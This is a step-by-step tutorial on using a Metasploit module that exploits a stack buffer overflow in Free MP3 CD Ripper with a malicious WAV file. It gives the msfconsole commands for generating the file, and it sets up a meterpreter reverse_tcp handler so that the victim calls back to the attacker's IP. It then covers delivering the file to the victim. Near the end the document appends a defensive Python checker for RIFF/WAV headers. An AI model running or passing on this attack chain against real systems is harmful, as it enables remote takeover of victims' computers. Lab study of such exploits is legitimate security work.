Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP 3
Vulnerable Application : Free MP3 CD Ripper 2.6.0.0
Exploit Credits : Richard Leahy, X-h4ck, Tiago Henriques
This exploit was already published on exploit-db.com in August, at http://www.exploit-db.com/exploits/17727/.
This module exploits a stack based buffer overflow found in Free MP3 CD Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious WAV file.
What I will explain in this step-by-step tutorial is how to use this exploit as a Metasploit module.
1. Free MP3 Ripper 2.6.0.0 (vulnerable application)
2. Free MP3 Ripper WAV exploit (download link)
Attacker IP Address : 192.168.8.90
Victim IP Address : 192.168.8.91
1. Download the required exploit above, and then copy it into the Metasploit file-format exploit directory:
cp free_mp3_ripper_wav.rb /pentest/exploits/framework/modules/exploits/windows/fileformat/
2. Open your console (CTRL + ALT + T) and type msfconsole to get into the Metasploit console.
3. Use the exploit we've just downloaded and set the payload we want to use.
4. After the exploit and payload are set up, we need to configure the options this exploit exposes (FYI: every exploit and payload has its own options to configure).
Information :
set filename Rock-n-Roll.wav --> give a nice name to the malicious file
set lhost 192.168.8.90 --> attacker IP address
set lport 443 --> attacker port (if the attack is successfully launched, the victim will make a reverse connection to this port)
set target 0 --> Windows XP SP3
exploit --> generate the malicious file
My malicious file (as you can see in the picture above) is stored at /root/.msf4/local/Rock-n-Roll.wav
5. Next you need to set up a Metasploit handler to handle the connection from the victim when they open the malicious file.
Information :
use exploit/multi/handler --> set up the Metasploit handler
set payload windows/meterpreter/reverse_tcp --> set the payload the same as in step 2
set lhost 192.168.8.90 --> set lhost the same as in step 4
set lport 443 --> set lport the same as in step 4
exploit --> start the handler
6. After everything has been set up, the next step is to deliver the malicious file to the victim. If you try this tutorial in your own lab, you can follow my previous tutorial about how to easily share Backtrack files (view tutorial here).
The picture below shows the victim opening the malicious WAV file on their Windows XP SP3 computer.
7. As soon as the victim opens our malicious file, our Metasploit console gets something interesting.
PWN3D!!
1. While I was writing this tutorial (10 Dec 2011) I still could not find a newer version of this software
2. Use a personal firewall to detect inbound and outbound traffic from your computer
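Because the overflow is triggered by a WAV file whose header the ripper trusts, a simple defensive check is to validate the RIFF chunk structure before a legacy tool ever opens the file. The following is an added example (not code from the post, the Metasploit module or the vendor): it walks the RIFF chunk list and reports chunks whose declared size does not fit in the file, non-printable chunk ids, missing fmt/data chunks and trailing bytes. The sample files are constructed inline; the check is a structural consistency test, not a signature for this specific exploit.

```python
import struct

# Upper bound for a single chunk; anything larger is reported (assumed policy value).
MAX_CHUNK_SIZE = 64 * 1024 * 1024


def check_wav(data: bytes, max_chunk_size: int = MAX_CHUNK_SIZE) -> list:
    """Walk the RIFF/WAVE chunk list and return a list of findings.

    An empty list means the header is internally consistent: every chunk's
    declared length fits inside the file, the RIFF size matches the file
    length, and both a fmt and a data chunk are present.
    """
    findings = []
    if len(data) < 12:
        return ["file shorter than the 12-byte RIFF header"]
    if data[0:4] != b"RIFF":
        findings.append("missing RIFF magic")
    riff_size = struct.unpack_from("<I", data, 4)[0]
    if riff_size + 8 != len(data):
        findings.append(
            f"RIFF size field {riff_size} does not match file length {len(data) - 8}"
        )
    if data[8:12] != b"WAVE":
        findings.append("form type is not WAVE")

    pos = 12
    seen = []
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        csize = struct.unpack_from("<I", data, pos + 4)[0]
        seen.append(cid)
        if not all(32 <= b < 127 for b in cid):
            findings.append(f"non-printable chunk id at offset {pos}: {cid!r}")
        remaining = len(data) - pos - 8
        if csize > remaining:
            # A length field larger than the bytes that actually follow is the
            # classic shape of a header-driven overflow; stop walking here.
            findings.append(
                f"chunk {cid!r} at offset {pos} claims {csize} bytes but only {remaining} remain"
            )
            break
        if csize > max_chunk_size:
            findings.append(f"chunk {cid!r} at offset {pos} exceeds {max_chunk_size} bytes")
        if cid == b"fmt " and csize not in (16, 18, 40):
            findings.append(f"unusual fmt chunk size {csize}")
        pos += 8 + csize + (csize & 1)  # chunks are padded to an even length
    else:
        # Loop ended without a break: anything left over is not a valid chunk.
        if pos != len(data):
            findings.append(f"{len(data) - pos} trailing bytes after last chunk")

    if b"fmt " not in seen:
        findings.append("no fmt chunk")
    if b"data" not in seen:
        findings.append("no data chunk")
    return findings


def build_wav(fmt_payload: bytes, data_size_field: int, data_payload: bytes) -> bytes:
    """Build a minimal WAV; data_size_field lets a test lie about the data length."""
    body = b"WAVE"
    body += b"fmt " + struct.pack("<I", len(fmt_payload)) + fmt_payload
    body += b"data" + struct.pack("<I", data_size_field) + data_payload
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples: 16-bit mono PCM at 8 kHz with 64 bytes of silence.
PCM_FMT = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)
GOOD_WAV = build_wav(PCM_FMT, 64, b"\x00" * 64)
# Same file, but the data chunk claims ~2 GB while only 64 bytes follow.
BAD_WAV = build_wav(PCM_FMT, 0x7FFFFFFF, b"\x00" * 64)


if __name__ == "__main__":
    for name, sample in (("good", GOOD_WAV), ("bad", BAD_WAV)):
        print(name, check_wav(sample) or "OK")
```

Run it over a directory of downloaded WAV files before handing them to an old ripper; a non-empty findings list is reason to quarantine the file rather than open it, and the same walk can be dropped into a mail or file-share scanner.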
Hope you enjoyed 🙂